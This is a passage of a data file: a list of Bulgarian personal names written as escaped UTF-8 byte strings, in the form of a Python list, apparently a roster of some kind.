\xd0\xa1\xd0\xa2\xd0\x95\xd0\xa4\xd0\x90\xd0\x9d\xd0\x9e\xd0\x92 \xd0\x92\xd0\x95\xd0\x9b\xd0\x98\xd0\x9a\xd0\x9e\xd0\x92', '\xd0\x91\xd0\x9e\xd0\xa0\xd0\x98\xd0\xa1\xd0\x9b\xd0\x90\xd0\x92 \xd0\xa2\xd0\x9e\xd0\x94\xd0\x9e\xd0\xa0\xd0\x9e\xd0\x92 \xd0\xa1\xd0\xa2\xd0\x9e\xd0\xaf\xd0\x9d\xd0\x9e\xd0\x92', '\xd0\x92\xd0\x90\xd0\x9d\xd0\xac\xd0\x9e \xd0\x95\xd0\x92\xd0\x93\xd0\x95\xd0\x9d\xd0\x98\xd0\x95\xd0\x92 \xd0\xa8\xd0\x90\xd0\xa0\xd0\x9a\xd0\x9e\xd0\x92', '\xd0\x95\xd0\x92\xd0\x93\xd0\x95\xd0\x9d\xd0\x98 \xd0\x94\xd0\x98\xd0\x9c\xd0\x98\xd0\xa2\xd0\xa0\xd0\x9e\xd0\x92 \xd0\xa1\xd0\xa2\xd0\x9e\xd0\x95\xd0\x92', '\xd0\x9c\xd0\x98\xd0\xa0\xd0\x9e\xd0\xa1\xd0\x9b\xd0\x90\xd0\x92 \xd0\x9d\xd0\x98\xd0\x9a\xd0\x9e\xd0\x9b\xd0\x9e\xd0\x92 \xd0\x9f\xd0\x95\xd0\xa2\xd0\x9a\xd0\x9e\xd0\x92', '\xd0\xa5\xd0\x90\xd0\xa1\xd0\x90\xd0\x9d \xd0\x98\xd0\x9b\xd0\x98\xd0\xaf\xd0\x97 \xd0\xa5\xd0\x90\xd0\x94\xd0\x96\xd0\x98\xd0\xa5\xd0\x90\xd0\xa1\xd0\x90\xd0\x9d', '\xd0\xa5\xd0\xa0\xd0\x98\xd0\xa1\xd0\xa2\xd0\x9e \xd0\x94\xd0\x98\xd0\x9c\xd0\x98\xd0\xa2\xd0\xa0\xd0\x9e\xd0\x92 \xd0\xa5\xd0\xa0\xd0\x98\xd0\xa1\xd0\xa2\xd0\x9e\xd0\x92', '\xd0\xa6\xd0\x92\xd0\x95\xd0\xa2\xd0\x90\xd0\x9d \xd0\x90\xd0\xa1\xd0\x95\xd0\x9d\xd0\x9e\xd0\x92 \xd0\xa6\xd0\x92\xd0\x95\xd0\xa2\xd0\x90\xd0\x9d\xd0\x9e\xd0\x92', '\xd0\xa6\xd0\x92\xd0\x95\xd0\xa2\xd0\x90\xd0\x9d \xd0\x93\xd0\x95\xd0\x9d\xd0\xa7\xd0\x95\xd0\x92 \xd0\xa6\xd0\x92\xd0\x95\xd0\xa2\xd0\x90\xd0\x9d\xd0\x9e\xd0\x92', '\xd0\x92\xd0\x9b\xd0\x90\xd0\x94\xd0\x98\xd0\x9c\xd0\x98\xd0\xa0 \xd0\xa6\xd0\x92\xd0\x95\xd0\xa2\xd0\x90\xd0\x9d\xd0\x9e\xd0\x92 \xd0\xa2\xd0\x9e\xd0\xa8\xd0\x95\xd0\x92', '\xd0\x9a\xd0\xa0\xd0\x98\xd0\xa1\xd0\xa2\xd0\x98\xd0\xaf\xd0\x9d\xd0\x90 \xd0\x9c\xd0\x95\xd0\xa2\xd0\x9e\xd0\x94\xd0\x98\xd0\x95\xd0\x92\xd0\x90 \xd0\x9f\xd0\x95\xd0\xa2\xd0\xa0\xd0\x9e\xd0\x92\xd0\x90', '\xd0\x9b\xd0\xae\xd0\x91\xd0\x9e\xd0\x9c\xd0\x98\xd0\x9b\xd0\x90 
\xd0\xa1\xd0\xa2\xd0\x90\xd0\x9d\xd0\x98\xd0\xa1\xd0\x9b\xd0\x90\xd0\x92\xd0\x9e\xd0\x92\xd0\x90 \xd0\xa1\xd0\xa2\xd0\x90\xd0\x9d\xd0\x98\xd0\xa1\xd0\x9b\xd0\x90\xd0\x92\xd0\x9e\xd0\x92\xd0\x90', '\xd0\x9c\xd0\x98\xd0\xa5\xd0\x90\xd0\x98\xd0\x9b \xd0\xa0\xd0\x90\xd0\x99\xd0\x9a\xd0\x9e\xd0\x92 \xd0\x9c\xd0\x98\xd0\x9a\xd0\x9e\xd0\x92', '\xd0\x90\xd0\xa1\xd0\x95\xd0\x9d \xd0\x99\xd0\x9e\xd0\xa0\xd0\x94\xd0\x90\xd0\x9d\xd0\x9e\xd0\x92 \xd0\x90\xd0\x93\xd0\x9e\xd0\x92', '\xd0\x92\xd0\x95\xd0\x9d\xd0\xa6\xd0\x98\xd0\xa1\xd0\x9b\xd0\x90\xd0\x92 \xd0\x90\xd0\xa1\xd0\x95\xd0\x9d\xd0\x9e\xd0\x92 \xd0\x9b\xd0\x90\xd0\x9a\xd0\x9e\xd0\x92', '\xd0\x93\xd0\x95\xd0\x9e\xd0\xa0\xd0\x93\xd0\x98 \xd0\xa2\xd0\x9e\xd0\x94\xd0\x9e\xd0\xa0\xd0\x9e\xd0\x92 \xd0\x91\xd0\x9e\xd0\x96\xd0\x98\xd0\x9d\xd0\x9e\xd0\x92', '\xd0\x9c\xd0\x90\xd0\xa0\xd0\x98\xd0\x9e \xd0\x98\xd0\x92\xd0\x90\xd0\x9d\xd0\x9e\xd0\x92 \xd0\xa2\xd0\x90\xd0\x93\xd0\x90\xd0\xa0\xd0\x98\xd0\x9d\xd0\xa1\xd0\x9a\xd0\x98', '\xd0\x9c\xd0\x98\xd0\xa0\xd0\x9e\xd0\xa1\xd0\x9b\xd0\x90\xd0\x92 \xd0\xa5\xd0\xa0\xd0\x98\xd0\xa1\xd0\xa2\xd0\x9e\xd0\xa4\xd0\x9e\xd0\xa0\xd0\x9e\xd0\x92 \xd0\x9d\xd0\x90\xd0\x99\xd0\x94\xd0\x95\xd0\x9d\xd0\x9e\xd0\x92', '\xd0\x9d\xd0\x98\xd0\x9a\xd0\x9e\xd0\x9b\xd0\x90\xd0\x99 \xd0\x93\xd0\x9e\xd0\xa0\xd0\x90\xd0\x9d\xd0\x9e\xd0\x92 \xd0\x9a\xd0\x9e\xd0\xa6\xd0\x95\xd0\x92', '\xd0\x9d\xd0\x98\xd0\x9a\xd0\x9e\xd0\x9b\xd0\x90\xd0\x99 \xd0\xa5\xd0\x98\xd0\x9d\xd0\x9a\xd0\x9e\xd0\x92 \xd0\xa0\xd0\x90\xd0\xa8\xd0\x95\xd0\x92', '\xd0\x93\xd0\x90\xd0\x9b\xd0\x98\xd0\x9d\xd0\x90 \xd0\x94\xd0\x98\xd0\x9c\xd0\x98\xd0\xa2\xd0\xa0\xd0\x9e\xd0\x92\xd0\x90 \xd0\x91\xd0\x90\xd0\x9d\xd0\x9a\xd0\x9e\xd0\x92\xd0\xa1\xd0\x9a\xd0\x90', '\xd0\x98\xd0\x92\xd0\x90\xd0\x9d \xd0\xa2\xd0\x9e\xd0\x94\xd0\x9e\xd0\xa0\xd0\x9e\xd0\x92 \xd0\x98\xd0\x92\xd0\x90\xd0\x9d\xd0\x9e\xd0\x92', '\xd0\x98\xd0\x92\xd0\x95\xd0\x9b\xd0\x98\xd0\x9d \xd0\x9d\xd0\x98\xd0\x9a\xd0\x9e\xd0\x9b\xd0\x9e\xd0\x92 
\xd0\x9d\xd0\x98\xd0\x9a\xd0\x9e\xd0\x9b\xd0\x9e\xd0\x92', '\xd0\x9c\xd0\x90\xd0\xa0\xd0\x98\xd0\x90\xd0\x9d\xd0\x90 \xd0\x98\xd0\x92\xd0\x90\xd0\x9d\xd0\x9e\xd0\x92\xd0\x90 \xd0\x94\xd0\x90\xd0\xa0\xd0\x90\xd0\x9a\xd0\xa7\xd0\x98\xd0\x95\xd0\x92\xd0\x90', '\xd0\xa6\xd0\x92\xd0\x95\xd0\xa2\xd0\x9e\xd0\x9c\xd0\x98\xd0\xa0 \xd0\xa6\xd0\x92\xd0\xaf\xd0\xa2\xd0\x9a\xd0\x9e\xd0\x92 \xd0\x9c\xd0\x98\xd0\xa5\xd0\x9e\xd0\x92', '\xd0\x92\xd0\x90\xd0\x9b\xd0\x95\xd0\x9d\xd0\xa2\xd0\x98\xd0\x9d \xd0\x9d\xd0\x98\xd0\x9a\xd0\x9e\xd0\x9b\xd0\x9e\xd0\x92 \xd0\x98\xd0\x92\xd0\x90\xd0\x9d\xd0\x9e\xd0\x92', '\xd0\x92\xd0\x90\xd0\x9d\xd0\xaf \xd0\x94\xd0\x9e\xd0\x9d\xd0\x95\xd0\x92\xd0\x90 \xd0\x93\xd0\x95\xd0\x9e\xd0\xa0\xd0\x93\xd0\x98\xd0\x95\xd0\x92\xd0\x90', '\xd0\x92\xd0\x95\xd0\x9d\xd0\xa6\xd0\x98\xd0\xa1\xd0\x9b\xd0\x90\xd0\x92 \xd0\x92\xd0\x90\xd0\xa1\xd0\x98\xd0\x9b\xd0\x95\xd0\x92 \xd0\x92\xd0\xaa\xd0\xa0\xd0\x91\xd0\x90\xd0\x9d\xd0\x9e\xd0\x92', '\xd0\x9a\xd0\x9e\xd0\xa0\xd0\x9c\xd0\x90\xd0\x9d \xd0\xaf\xd0\x9a\xd0\xa3\xd0\x91\xd0\x9e\xd0\x92 \xd0\x98\xd0\xa1\xd0\x9c\xd0\x90\xd0\x98\xd0\x9b\xd0\x9e\xd0\x92', '\xd0\x9f\xd0\x95\xd0\xa2\xd0\xaa\xd0\xa0 \xd0\x92\xd0\x9b\xd0\x90\xd0\x94\xd0\x98\xd0\x9c\xd0\x98\xd0\xa0\xd0\x9e\xd0\x92 \xd0\x94\xd0\x98\xd0\x9c\xd0\x98\xd0\xa2\xd0\xa0\xd0\x9e\xd0\x92', '\xd0\xa0\xd0\xa3\xd0\x9c\xd0\x95\xd0\x9d \xd0\x98\xd0\x92\xd0\x90\xd0\x9d\xd0\x9e\xd0\x92 \xd0\x98\xd0\x92\xd0\x90\xd0\x9d\xd0\x9e\xd0\x92', '\xd0\xa1\xd0\x92\xd0\x95\xd0\xa2\xd0\x9e\xd0\x9c\xd0\x98\xd0\xa0 \xd0\x9a\xd0\x9e\xd0\x9d\xd0\xa1\xd0\xa2\xd0\x90\xd0\x9d\xd0\xa2\xd0\x98\xd0\x9d\xd0\x9e\xd0\x92 \xd0\x9c\xd0\x98\xd0\xa5\xd0\x90\xd0\x99\xd0\x9b\xd0\x9e\xd0\x92', '\xd0\x90\xd0\xa5\xd0\x9c\xd0\x95\xd0\x94 \xd0\x94\xd0\x95\xd0\x9c\xd0\x98\xd0\xa0 \xd0\x94\xd0\x9e\xd0\x93\xd0\x90\xd0\x9d', '\xd0\x92\xd0\x95\xd0\x96\xd0\x94\xd0\x98 \xd0\x9b\xd0\x95\xd0\xa2\xd0\x98\xd0\xa4 \xd0\xa0\xd0\x90\xd0\xa8\xd0\x98\xd0\x94\xd0\x9e\xd0\x92', '\xd0\x9d\xd0\x95\xd0\x94\xd0\x96\xd0\x9c\xd0\x98 
\xd0\x9d\xd0\x98\xd0\xaf\xd0\x97\xd0\x98 \xd0\x90\xd0\x9b\xd0\x98', '\xd0\xa0\xd0\x95\xd0\x9c\xd0\x97\xd0\x98 \xd0\x94\xd0\xa3\xd0\xa0\xd0\x9c\xd0\xa3\xd0\xa8 \xd0\x9e\xd0\xa1\xd0\x9c\xd0\x90\xd0\x9d', '\xd0\xae\xd0\x9d\xd0\x90\xd0\x9b \xd0\xa2\xd0\x90\xd0\xa1\xd0\x98\xd0\x9c \xd0\xa2\xd0\x90\xd0\xa1\xd0\x98\xd0\x9c', '\xd0\x92\xd0\x90\xd0\x9b\xd0\x95\xd0\x9d\xd0\xa2\xd0\x98\xd0\x9d \xd0\xa2\xd0\x9e\xd0\x9d\xd0\xa7\xd0\x95\xd0\x92 \xd0\x9c\xd0\x98\xd0\x9a\xd0\x95\xd0\x92', '\xd0\x94\xd0\x98\xd0\x9c\xd0\x98\xd0\xa2\xd0\xaa\xd0\xa0 \xd0\x99\xd0\x9e\xd0\xa0\xd0\x94\xd0\x90\xd0\x9d\xd0\x9e\xd0\x92 \xd0\xa7\xd0\xa3\xd0\x9a\xd0\x90\xd0\xa0\xd0\xa1\xd0\x9a\xd0\x98', '\xd0\x95\xd0\x9c\xd0\x98\xd0\x9b \xd0\x94\xd0\x98\xd0\x9c\xd0\x98\xd0\xa2\xd0\xa0\xd0\x9e\xd0\x92 \xd0\x93\xd0\xa3\xd0\xa9\xd0\x95\xd0\xa0\xd0\x9e\xd0\x92', '\xd0\x9a\xd0\x98\xd0\xa0\xd0\x98\xd0\x9b \xd0\x91\xd0\x9e\xd0\xaf\xd0\x9d\xd0\x9e\xd0\x92 \xd0\x9a\xd0\x90\xd0\x9b\xd0\xa4\xd0\x98\xd0\x9d', '\xd0\x9c\xd0\x90\xd0\xaf \xd0\x91\xd0\x9e\xd0\x96\xd0\x98\xd0\x94\xd0\x90\xd0\xa0\xd0\x9e\xd0\x92\xd0\x90 \xd0\x9c\xd0\x90\xd0\x9d\xd0\x9e\xd0\x9b\xd0\x9e\xd0\x92\xd0\x90', '\xd0\x90\xd0\x9d\xd0\x90\xd0\xa2\xd0\x9e\xd0\x9b\xd0\x98\xd0\x99 \xd0\x92\xd0\x95\xd0\x9b\xd0\x98\xd0\x9a\xd0\x9e\xd0\x92 \xd0\x99\xd0\x9e\xd0\xa0\xd0\x94\xd0\x90\xd0\x9d\xd0\x9e\xd0\x92', '\xd0\x95\xd0\x92\xd0\x93\xd0\x95\xd0\x9d\xd0\x98\xd0\x99 \xd0\x92\xd0\x90\xd0\xa1\xd0\x98\xd0\x9b\xd0\x95\xd0\x92 \xd0\xa3\xd0\x97\xd0\xa3\xd0\x9d\xd0\x9e\xd0\x92', '\xd0\x9a\xd0\x98\xd0\xa0\xd0\x98\xd0\x9b \xd0\x92\xd0\x9b\xd0\x90\xd0\x94\xd0\x98\xd0\x9c\xd0\x98\xd0\xa0\xd0\x9e\xd0\x92 \xd0\x93\xd0\xa3\xd0\x9c\xd0\x9d\xd0\x95\xd0\xa0\xd0\x9e\xd0\x92', '\xd0\x9c\xd0\x98\xd0\xa5\xd0\x90\xd0\x98\xd0\x9b \xd0\x9d\xd0\x95\xd0\x9d\xd0\x9e\xd0\x92 \xd0\x9d\xd0\x98\xd0\x9a\xd0\x9e\xd0\x9b\xd0\x9e\xd0\x92\xd0\xa1\xd0\x9a\xd0\x98', '\xd0\xa1\xd0\xa2\xd0\x90\xd0\x9d\xd0\x9a\xd0\x90 \xd0\x9b\xd0\x90\xd0\x9b\xd0\x95\xd0\x92\xd0\x90 
\xd0\xa8\xd0\x90\xd0\x99\xd0\x9b\xd0\x95\xd0\x9a\xd0\x9e\xd0\x92\xd0\x90', '\xd0\x91\xd0\x98\xd0\xa1\xd0\x95\xd0\xa0\xd0\x9a\xd0\x90 \xd0\x91\xd0\x9e\xd0\xa0\xd0\x9e\xd0\x92\xd0\x90 \xd0\x9f\xd0\x95\xd0\xa2\xd0\xa0\xd0\x9e\xd0\x92\xd0\x90', '\xd0\x94\xd0\x98\xd0\x9c\xd0\x98\xd0\xa2\xd0\xaa\xd0\xa0 \xd0\x98\xd0\x92\xd0\x90\xd0\x9d\xd0\x9e\xd0\x92 \xd0\x90\xd0\x92\xd0\xa0\xd0\x90\xd0\x9c\xd0\x9e\xd0\x92', '\xd0\x98\xd0\xa1\xd0\x9a\xd0\xa0\xd0\x90 \xd0\xa4\xd0\x98\xd0\x94\xd0\x9e\xd0\xa1\xd0\x9e\xd0\x92\xd0\x90 \xd0\x98\xd0\xa1\xd0\x9a\xd0\xa0\xd0\x95\xd0\x9d\xd0\x9e\xd0\x92\xd0\x90', '\xd0\x9b\xd0\xae\xd0\x91\xd0\x9e\xd0\x9c\xd0\x98\xd0\xa0 \xd0\xa2\xd0\x9e\xd0\x94\xd0\x9e\xd0\xa0\xd0\x9e\xd0\x92 \xd0\x98\xd0\x92\xd0\x90\xd0\x9d\xd0\x9e\xd0\x92', '\xd0\x9f\xd0\x9b\xd0\x90\xd0\x9c\xd0\x95\xd0\x9d \xd0\x93\xd0\x95\xd0\x9e\xd0\xa0\xd0\x93\xd0\x98\xd0\x95\xd0\x92 \xd0\xa6\xd0\x95\xd0\x9a\xd0\x9e\xd0\x92', '\xd0\xaf\xd0\x9d\xd0\x90\xd0\x9a\xd0\x98 \xd0\x91\xd0\x9e\xd0\xaf\xd0\x9d\xd0\x9e\xd0\x92 \xd0\xa1\xd0\xa2\xd0\x9e\xd0\x98\xd0\x9b\xd0\x9e\xd0\x92', '\xd0\x90\xd0\x9d\xd0\x93\xd0\x95\xd0\x9b \xd0\x93\xd0\x95\xd0\x9e\xd0\xa0\xd0\x93\xd0\x98\xd0\x95\xd0\x92 \xd0\x94\xd0\x90\xd0\xa1\xd0\x9a\xd0\x90\xd0\x9b\xd0\x9e\xd0\x92', '\xd0\x93\xd0\x95\xd0\x9e\xd0\xa0\xd0\x93\xd0\x98 \xd0\x93\xd0\x95\xd0\x9e\xd0\xa0\xd0\x93\xd0\x98\xd0\x95\xd0\x92 \xd0\x9f\xd0\x98\xd0\xa0\xd0\x98\xd0\x9d\xd0\xa1\xd0\x9a\xd0\x98', '\xd0\x93\xd0\x95\xd0\x9e\xd0\xa0\xd0\x93\xd0\x98 \xd0\x94\xd0\x90\xd0\x9d\xd0\x90\xd0\x98\xd0\x9b\xd0\x9e\xd0\x92 \xd0\x9f\xd0\x95\xd0\xa2\xd0\xaa\xd0\xa0\xd0\x9d\xd0\x95\xd0\x99\xd0\xa7\xd0\x95\xd0\x92', '\xd0\x93\xd0\x98\xd0\x9d\xd0\xa7\xd0\x95 \xd0\x94\xd0\x98\xd0\x9c\xd0\x98\xd0\xa2\xd0\xa0\xd0\x9e\xd0\x92\xd0\x90 \xd0\x9a\xd0\x90\xd0\xa0\xd0\x90\xd0\x9c\xd0\x98\xd0\x9d\xd0\x9e\xd0\x92\xd0\x90', '\xd0\x94\xd0\x95\xd0\x9b\xd0\xaf\xd0\x9d \xd0\xa1\xd0\x9b\xd0\x90\xd0\x92\xd0\xa7\xd0\x95\xd0\x92 \xd0\x9f\xd0\x95\xd0\x95\xd0\x92\xd0\xa1\xd0\x9a\xd0\x98', 
'\xd0\x98\xd0\x92\xd0\x90\xd0\x9d \xd0\x94\xd0\x98\xd0\x9c\xd0\x98\xd0\xa2\xd0\xa0\xd0\x9e\xd0\x92 \xd0\x98\xd0\x92\xd0\x90\xd0\x9d\xd0\x9e\xd0\x92', '\xd0\x98\xd0\xa1\xd0\x9a\xd0\xa0\xd0\x90 \xd0\x94\xd0\x98\xd0\x9c\xd0\x98\xd0\xa2\xd0\xa0\xd0\x9e\xd0\x92\xd0\x90 \xd0\x9c\xd0\x98\xd0\xa5\xd0\x90\xd0\x99\xd0\x9b\xd0\x9e\xd0\x92\xd0\x90-\xd0\x9a\xd0\x9e\xd0\x9f\xd0\x90\xd0\xa0\xd0\x9e\xd0\x92\xd0\x90', '\xd0\x9a\xd0\xa0\xd0\x90\xd0\xa1\xd0\x98\xd0\x9c\xd0\x98\xd0\xa0\xd0\x90 \xd0\xa9\xd0\x95\xd0\xa0\xd0\x95\xd0\x92\xd0\x90 \xd0\xa1\xd0\x98\xd0\x9c\xd0\x95\xd0\x9e\xd0\x9d\xd0\x9e\xd0\x92\xd0\x90', '\xd0\x9d\xd0\x98\xd0\x9a\xd0\x9e\xd0\x9b\xd0\x90 \xd0\x98\xd0\x92\xd0\x90\xd0\x9d\xd0\x9e\xd0\x92 \xd0\x91\xd0\x95\xd0\x9b\xd0\x98\xd0\xa8\xd0\x9a\xd0\x98', '\xd0\x90\xd0\x9d\xd0\x93\xd0\x95\xd0\x9b \xd0\x9f\xd0\x95\xd0\xa2\xd0\xa0\xd0\x9e\xd0\x92 \xd0\x9d\xd0\x90\xd0\x99\xd0\x94\xd0\x95\xd0\x9d\xd0\x9e\xd0\x92', '\xd0\x92\xd0\x9b\xd0\x90\xd0\x94\xd0\x98\xd0\xa1\xd0\x9b\xd0\x90\xd0\x92 \xd0\x95\xd0\x92\xd0\x93\xd0\x95\xd0\x9d\xd0\x98\xd0\x95\xd0\x92 \xd0\x94\xd0\x98\xd0\x9c\xd0\x98\xd0\xa2\xd0\xa0\xd0\x9e\xd0\x92', '\xd0\x94\xd0\x98\xd0\x9c\xd0\x98\xd0\xa2\xd0\xaa\xd0\xa0 \xd0\x90\xd0\xa1\xd0\x95\xd0\x9d\xd0\x9e\xd0\x92 \xd0\x9a\xd0\x9e\xd0\x9b\xd0\x95\xd0\x92', '\xd0\x98\xd0\xa0\xd0\x95\xd0\x9d\xd0\x90 \xd0\x9b\xd0\xae\xd0\x91\xd0\x95\xd0\x9d\xd0\x9e\xd0\x92\xd0\x90 \xd0\xa1\xd0\x9e\xd0\x9a\xd0\x9e\xd0\x9b\xd0\x9e\xd0\x92\xd0\x90', '\xd0\x9f\xd0\x95\xd0\xa2\xd0\xaa\xd0\xa0 \xd0\x9c\xd0\x95\xd0\xa2\xd0\x9e\xd0\x94\xd0\x98\xd0\x95\xd0\x92 \xd0\x9f\xd0\x95\xd0\xa2\xd0\xa0\xd0\x9e\xd0\x92', '\xd0\x93\xd0\x95\xd0\x9e\xd0\xa0\xd0\x93\xd0\x98 \xd0\xa7\xd0\x90\xd0\x92\xd0\x94\xd0\x90\xd0\xa0\xd0\x9e\xd0\x92 \xd0\x90\xd0\x9d\xd0\x90\xd0\xa1\xd0\xa2\xd0\x90\xd0\xa1\xd0\x9e\xd0\x92', '\xd0\x94\xd0\x90\xd0\xa0\xd0\x98\xd0\x9d \xd0\x92\xd0\x95\xd0\x9b\xd0\x98\xd0\xa7\xd0\x9a\xd0\x9e\xd0\x92 \xd0\x9c\xd0\x90\xd0\xa2\xd0\x9e\xd0\x92', 
'\xd0\x94\xd0\x95\xd0\xa1\xd0\x98\xd0\xa1\xd0\x9b\xd0\x90\xd0\x92 \xd0\xa1\xd0\x9b\xd0\x90\xd0\x92\xd0\x9e\xd0\x92 \xd0\xa7\xd0\xa3\xd0\x9a\xd0\x9e\xd0\x9b\xd0\x9e\xd0\x92', '\xd0\x98\xd0\x92\xd0\x95\xd0\x9b\xd0\x98\xd0\x9d \xd0\x9d\xd0\x98\xd0\x9a\xd0\x9e\xd0\x9b\xd0\x90\xd0\x95\xd0\x92 \xd0\x9d\xd0\x98\xd0\x9a\xd0\x9e\xd0\x9b\xd0\x9e\xd0\x92', '\xd0\x9c\xd0\x98\xd0\xa2\xd0\xa5\xd0\x90\xd0\xa2 \xd0\xa1\xd0\x90\xd0\x91\xd0\xa0\xd0\x98 \xd0\x9c\xd0\x95\xd0\xa2\xd0\x98\xd0\x9d', '\xd0\x9f\xd0\x9b\xd0\x90\xd0\x9c\xd0\x95\xd0\x9d \xd0\xa2\xd0\x90\xd0\xa7\xd0\x95\xd0\x92 \xd0\x9f\xd0\x95\xd0\xa2\xd0\xa0\xd0\x9e\xd0\x92', '\xd0\xa0\xd0\xa3\xd0\x9c\xd0\x95\xd0\x9d \xd0\x99\xd0\x9e\xd0\xa0\xd0\x94\xd0\x90\xd0\x9d\xd0\x9e\xd0\x92 \xd0\x9f\xd0\x95\xd0\xa2\xd0\x9a\xd0\x9e\xd0\x92', '\xd0\xa5\xd0\xa0\xd0\x98\xd0\xa1\xd0\xa2\xd0\x98\xd0\x9d\xd0\x90 \xd0\x98\xd0\x92\xd0\x90\xd0\x9d\xd0\x9e\xd0\x92\xd0\x90 \xd0\xaf\xd0\x9d\xd0\xa7\xd0\x95\xd0\x92\xd0\x90', '\xd0\xa6\xd0\x92\xd0\x95\xd0\xa2\xd0\x90\xd0\x9d \xd0\x9a\xd0\x9e\xd0\xa1\xd0\xa2\xd0\x9e\xd0\x92 \xd0\x9a\xd0\x9e\xd0\xa1\xd0\xa2\xd0\x9e\xd0\x92', '\xd0\xa6\xd0\x95\xd0\xa6\xd0\x9a\xd0\x90 \xd0\xa6\xd0\x90\xd0\xa7\xd0\x95\xd0\x92\xd0\x90 \xd0\x94\xd0\x90\xd0\x9d\xd0\x93\xd0\x9e\xd0\x92\xd0\xa1\xd0\x9a\xd0\x90', '\xd0\x92\xd0\x95\xd0\x9b\xd0\x98\xd0\xa7\xd0\x9a\xd0\x90 \xd0\x9d\xd0\x98\xd0\x9a\xd0\x9e\xd0\x9b\xd0\x9e\xd0\x92\xd0\x90 \xd0\xa8\xd0\x9e\xd0\x9f\xd0\x9e\xd0\x92\xd0\x90', '\xd0\x94\xd0\x98\xd0\x9c\xd0\x9e \xd0\x93\xd0\x95\xd0\x9e\xd0\xa0\xd0\x93\xd0\x98\xd0\x95\xd0\x92 \xd0\x93\xd0\xaf\xd0\xa3\xd0\xa0\xd0\x9e\xd0\x92', '\xd0\x97\xd0\x90\xd0\xa5\xd0\x90\xd0\xa0\xd0\x98 \xd0\x94\xd0\x98\xd0\x9c\xd0\x98\xd0\xa2\xd0\xa0\xd0\x9e\xd0\x92 \xd0\x93\xd0\x95\xd0\x9e\xd0\xa0\xd0\x93\xd0\x98\xd0\x95\xd0\x92', '\xd0\x97\xd0\x9e\xd0\xaf \xd0\xaf\xd0\x9d\xd0\x95\xd0\x92\xd0\x90 \xd0\x93\xd0\x95\xd0\x9e\xd0\xa0\xd0\x93\xd0\x98\xd0\x95\xd0\x92\xd0\x90', '\xd0\x98\xd0\x92\xd0\x90\xd0\x9d 
\xd0\x91\xd0\x9e\xd0\xa0\xd0\x98\xd0\xa1\xd0\x9e\xd0\x92 \xd0\xa2\xd0\x9e\xd0\xa2\xd0\x95\xd0\x92', '\xd0\x9a\xd0\x9e\xd0\xa1\xd0\xa2\xd0\x90\xd0\x94\xd0\x98\xd0\x9d \xd0\x92\xd0\x90\xd0\xa1\xd0\x98\xd0\x9b\xd0\x95\xd0\x92 \xd0\xaf\xd0\x97\xd0\x9e\xd0\x92', '\xd0\x9c\xd0\x95\xd0\x9d\xd0\x94\xd0\x90 \xd0\x9a\xd0\x98\xd0\xa0\xd0\x98\xd0\x9b\xd0\x9e\xd0\x92\xd0\x90 \xd0\xa1\xd0\xa2\xd0\x9e\xd0\xaf\xd0\x9d\xd0\x9e\xd0\x92\xd0\x90', '\xd0\x9f\xd0\x90\xd0\x92\xd0\x95\xd0\x9b \xd0\x94\xd0\x98\xd0\x9c\xd0\x98\xd0\xa2\xd0\xa0\xd0\x9e\xd0\x92 \xd0\xa8\xd0\x9e\xd0\x9f\xd0\x9e\xd0\x92', '\xd0\xa1\xd0\xa2\xd0\x95\xd0\xa4\xd0\x90\xd0\x9d \xd0\x98\xd0\x92\xd0\x90\xd0\x9d\xd0\x9e\xd0\x92 \xd0\x94\xd0\x95\xd0\x94\xd0\x95\xd0\x92', '\xd0\xa1\xd0\xa2\xd0\x95\xd0\xa4\xd0\x90\xd0\x9d \xd0\x9b\xd0\x90\xd0\x9c\xd0\x91\xd0\x9e\xd0\x92 \xd0\x94\xd0\x90\xd0\x9d\xd0\x90\xd0\x98\xd0\x9b\xd0\x9e\xd0\x92', '\xd0\x93\xd0\x95\xd0\x9e\xd0\xa0\xd0\x93\xd0\x98 \xd0\x93\xd0\x95\xd0\x9e\xd0\xa0\xd0\x93\xd0\x98\xd0\x95\xd0\x92 \xd0\x9f\xd0\x9b\xd0\x90\xd0\xa7\xd0\x9a\xd0\x9e\xd0\x92', '\xd0\x94\xd0\x98\xd0\x9c\xd0\x98\xd0\xa2\xd0\xaa\xd0\xa0 \xd0\x9d\xd0\x98\xd0\x9a\xd0\x9e\xd0\x9b\xd0\x9e\xd0\x92 \xd0\x9b\xd0\x90\xd0\x97\xd0\x90\xd0\xa0\xd0\x9e\xd0\x92', '\xd0\x98\xd0\x9b\xd0\x98\xd0\xaf \xd0\x98\xd0\x92\xd0\x90\xd0\x9d\xd0\x9e\xd0\x92 \xd0\x9f\xd0\x90\xd0\xa8\xd0\x95\xd0\x92', '\xd0\x99\xd0\x9e\xd0\xa0\xd0\x94\xd0\x90\xd0\x9d \xd0\x98\xd0\x92\xd0\x90\xd0\x9d\xd0\x9e\xd0\x92 \xd0\x91\xd0\x90\xd0\x9a\xd0\x90\xd0\x9b\xd0\x9e\xd0\x92', '\xd0\x9c\xd0\x98\xd0\x9b\xd0\x95\xd0\x9d\xd0\x90 \xd0\x98\xd0\x92\xd0\x90\xd0\x9d\xd0\x9e\xd0\x92\xd0\x90 \xd0\xa5\xd0\xa0\xd0\x98\xd0\xa1\xd0\xa2\xd0\x9e\xd0\x92\xd0\x90', '\xd0\x9d\xd0\x98\xd0\x9a\xd0\x9e\xd0\x9b\xd0\x90\xd0\x99 \xd0\x9f\xd0\x95\xd0\xa2\xd0\x9a\xd0\x9e\xd0\x92 \xd0\x9f\xd0\x95\xd0\xa2\xd0\x9a\xd0\x9e\xd0\x92', '\xd0\x9e\xd0\x93\xd0\x9d\xd0\xaf\xd0\x9d \xd0\xa1\xd0\xa2\xd0\x9e\xd0\x98\xd0\xa7\xd0\x9a\xd0\x9e\xd0\x92 
\xd0\xaf\xd0\x9d\xd0\x90\xd0\x9a\xd0\x98\xd0\x95\xd0\x92', '\xd0\x9f\xd0\x95\xd0\xa2\xd0\xaa\xd0\xa0 \xd0\x92\xd0\x90\xd0\xa1\xd0\x98\xd0\x9b\xd0\x95\xd0\x92 \xd0\x9c\xd0\xa3\xd0\xa2\xd0\x90\xd0\xa4\xd0\xa7\xd0\x98\xd0\x95\xd0\x92', '\xd0\x9f\xd0\x95\xd0\xa2\xd0\xaf \xd0\x9d\xd0\x98\xd0\x9a\xd0\x9e\xd0\x9b\xd0\x9e\xd0\x92\xd0\x90 \xd0\xa0\xd0\x90\xd0\x95\xd0\x92\xd0\x90', '\xd0\xa1\xd0\x98\xd0\x9b\xd0\x92\xd0\x98\xd0\xaf \xd0\x90\xd0\x9d\xd0\x90\xd0\xa1\xd0\xa2\xd0\x90\xd0\xa1\xd0\x9e\xd0\x92\xd0\x90 